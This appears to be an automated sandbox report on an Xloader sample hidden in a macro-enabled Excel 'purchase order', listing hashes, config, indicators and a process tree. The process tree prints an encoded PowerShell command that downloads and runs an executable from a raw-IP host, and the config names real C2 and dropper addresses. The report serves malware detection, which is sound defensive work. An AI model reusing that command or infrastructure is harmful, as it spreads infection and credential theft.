xloader | 1bb358787d60e233085600f2c9140c228314fa4ba9d9a49f85c2605359d47cc2

General

Target

Purchase order 45037966707/Purchase order 45037966707.xlsm
Size

22KB
MD5

9fc5194e1a01302c4495dfeb12f47085
SHA1

d61c8d632c0b6a1395d4c8e7702bb93f11e5c318
SHA256

37ea86d0e937ae285a463cf50c529ca69d6621f49c34e03b407fc2726b292d0c
SHA512

1e06c982cc4907a0d343324fd022d549545c74879bc57b2b2350c84ce42da3917a5dde889ff3b1511b52cf58eb1c9aad5d41bf49b8dad2aa407510ecc0b8c505

Score

10^/10

xloader pufi loader rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://20.102.53.71/mvn/systemdc.exe

Extracted

Family

xloader

Version

2.5

Campaign

pufi

C2

http://www.homestechs.com/pufi/

Decoy

fusiongroupgames.net

hugevari.com

rebeccagriffiths.com

trocaoferta.com

theslashapp.com

codezonesoftware.xyz

sottocommunications.com

minicreators.online

course2millions.com

hfm5n1dhkjqwpe.xyz

xlab-ub.com

silvanaribeirocake.com

thefabinteriordesign.com

mg-leadership.com

petbort.com

ndust.net

203040302.xyz

jakital.com

shophuunghia.info

rednacionaldejuecesrd.net

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1048	668	cmd.exe	EXCEL.EXE

Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader

Xloader Payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral3/memory/1468-73-0x0000000000400000-0x0000000000429000-memory.dmp	xloader
behavioral3/memory/1468-74-0x000000000041D450-mapping.dmp	xloader
behavioral3/memory/1468-80-0x0000000000400000-0x0000000000429000-memory.dmp	xloader
behavioral3/memory/340-87-0x0000000000080000-0x00000000000A9000-memory.dmp	xloader

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1172 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Ekzjgllskgnjmxcgqvor.exeEkzjgllskgnjmxcgqvor.exe

pid process

1316 Ekzjgllskgnjmxcgqvor.exe
1468 Ekzjgllskgnjmxcgqvor.exe
Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

668 EXCEL.EXE
Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid process

1172 powershell.exe

flow	pid	process
4	1172	powershell.exe

pid	process
1316	Ekzjgllskgnjmxcgqvor.exe
1468	Ekzjgllskgnjmxcgqvor.exe

pid	process
668	EXCEL.EXE

Suspicious use of SetThreadContext 4 IoCs

Processes:

Ekzjgllskgnjmxcgqvor.exeEkzjgllskgnjmxcgqvor.exeraserver.exe

description	pid	process	target process
PID 1316 set thread context of 1468	1316	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1468 set thread context of 1408	1468	Ekzjgllskgnjmxcgqvor.exe	Explorer.EXE
PID 1468 set thread context of 1408	1468	Ekzjgllskgnjmxcgqvor.exe	Explorer.EXE
PID 340 set thread context of 1408	340	raserver.exe	Explorer.EXE

Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	EXCEL.EXE

NTFS ADS 1 IoCs

Processes:

EXCEL.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\Purchase order 45037966707\A9367F00\:Zone.Identifier:$DATA EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

668 EXCEL.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\Purchase order 45037966707\A9367F00\:Zone.Identifier:$DATA	EXCEL.EXE

pid	process
668	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 54 IoCs

Processes:

powershell.exeEkzjgllskgnjmxcgqvor.exeraserver.exe

pid	process
1172	powershell.exe
1172	powershell.exe
1172	powershell.exe
1468	Ekzjgllskgnjmxcgqvor.exe
1468	Ekzjgllskgnjmxcgqvor.exe
1468	Ekzjgllskgnjmxcgqvor.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe
340	raserver.exe

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

Ekzjgllskgnjmxcgqvor.exeraserver.exe

pid	process
1468	Ekzjgllskgnjmxcgqvor.exe
1468	Ekzjgllskgnjmxcgqvor.exe
1468	Ekzjgllskgnjmxcgqvor.exe
1468	Ekzjgllskgnjmxcgqvor.exe
340	raserver.exe
340	raserver.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

668 EXCEL.EXE

pid	process
668	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exeEkzjgllskgnjmxcgqvor.exeraserver.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	1468	Ekzjgllskgnjmxcgqvor.exe
Token: SeDebugPrivilege	340	raserver.exe
Token: SeShutdownPrivilege	1408	Explorer.EXE
Token: SeShutdownPrivilege	1408	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

EXCEL.EXE

pid process

668 EXCEL.EXE
668 EXCEL.EXE
668 EXCEL.EXE
668 EXCEL.EXE
668 EXCEL.EXE
668 EXCEL.EXE

pid	process
668	EXCEL.EXE
668	EXCEL.EXE
668	EXCEL.EXE
668	EXCEL.EXE
668	EXCEL.EXE
668	EXCEL.EXE

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeEkzjgllskgnjmxcgqvor.exeExplorer.EXEraserver.exe

description	pid	process	target process
PID 668 wrote to memory of 1048	668	EXCEL.EXE	cmd.exe
PID 668 wrote to memory of 1048	668	EXCEL.EXE	cmd.exe
PID 668 wrote to memory of 1048	668	EXCEL.EXE	cmd.exe
PID 668 wrote to memory of 1048	668	EXCEL.EXE	cmd.exe
PID 1048 wrote to memory of 1172	1048	cmd.exe	powershell.exe
PID 1048 wrote to memory of 1172	1048	cmd.exe	powershell.exe
PID 1048 wrote to memory of 1172	1048	cmd.exe	powershell.exe
PID 1048 wrote to memory of 1172	1048	cmd.exe	powershell.exe
PID 1172 wrote to memory of 1316	1172	powershell.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1172 wrote to memory of 1316	1172	powershell.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1172 wrote to memory of 1316	1172	powershell.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1172 wrote to memory of 1316	1172	powershell.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1316 wrote to memory of 1468	1316	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1316 wrote to memory of 1468	1316	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1316 wrote to memory of 1468	1316	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1316 wrote to memory of 1468	1316	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1316 wrote to memory of 1468	1316	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1316 wrote to memory of 1468	1316	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1316 wrote to memory of 1468	1316	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 1408 wrote to memory of 340	1408	Explorer.EXE	raserver.exe
PID 1408 wrote to memory of 340	1408	Explorer.EXE	raserver.exe
PID 1408 wrote to memory of 340	1408	Explorer.EXE	raserver.exe
PID 1408 wrote to memory of 340	1408	Explorer.EXE	raserver.exe
PID 340 wrote to memory of 1996	340	raserver.exe	cmd.exe
PID 340 wrote to memory of 1996	340	raserver.exe	cmd.exe
PID 340 wrote to memory of 1996	340	raserver.exe	cmd.exe
PID 340 wrote to memory of 1996	340	raserver.exe	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1408

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Purchase order 45037966707\Purchase order 45037966707.xlsm"
2⤵
- Deletes itself
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\SysWOW64\cmd.exe
cmd /c Bqzazthpkhjgkygrz.bat
3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBFAGsAegBqAGcAbABsAHMAawBnAG4AagBtAHgAYwBnAHEAdgBvAHIALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwAyADAALgAxADAAMgAuADUAMwAuADcAMQAvAG0AdgBuAC8AcwB5AHMAdABlAG0AZABjAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1172

C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
"C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1316

C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
"C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\Windows\SysWOW64\raserver.exe
"C:\Windows\SysWOW64\raserver.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:340

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe"
3⤵
PID:1996

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
MD5
91679f42cd3ba051b5c7ce37d45b222c

SHA1
decc607894a299033ed3ede115a3bce51d21020b

SHA256
e059ab9141d67e0b2e9eb83d34ba88e480f7091bcd97b78466386a17b44a235e

SHA512
b3dd48fc2267a50e9468e0e0be746e224618fd4aaab07e69c3f32c473831145a9fdd6a4cf87266f284bed9c9d1bf227f21f244d15242582f096dc4bf9c64855a

Download Submit
C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
MD5
91679f42cd3ba051b5c7ce37d45b222c

SHA1
decc607894a299033ed3ede115a3bce51d21020b

SHA256
e059ab9141d67e0b2e9eb83d34ba88e480f7091bcd97b78466386a17b44a235e

SHA512
b3dd48fc2267a50e9468e0e0be746e224618fd4aaab07e69c3f32c473831145a9fdd6a4cf87266f284bed9c9d1bf227f21f244d15242582f096dc4bf9c64855a

Download Submit
C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
MD5
91679f42cd3ba051b5c7ce37d45b222c

SHA1
decc607894a299033ed3ede115a3bce51d21020b

SHA256
e059ab9141d67e0b2e9eb83d34ba88e480f7091bcd97b78466386a17b44a235e

SHA512
b3dd48fc2267a50e9468e0e0be746e224618fd4aaab07e69c3f32c473831145a9fdd6a4cf87266f284bed9c9d1bf227f21f244d15242582f096dc4bf9c64855a

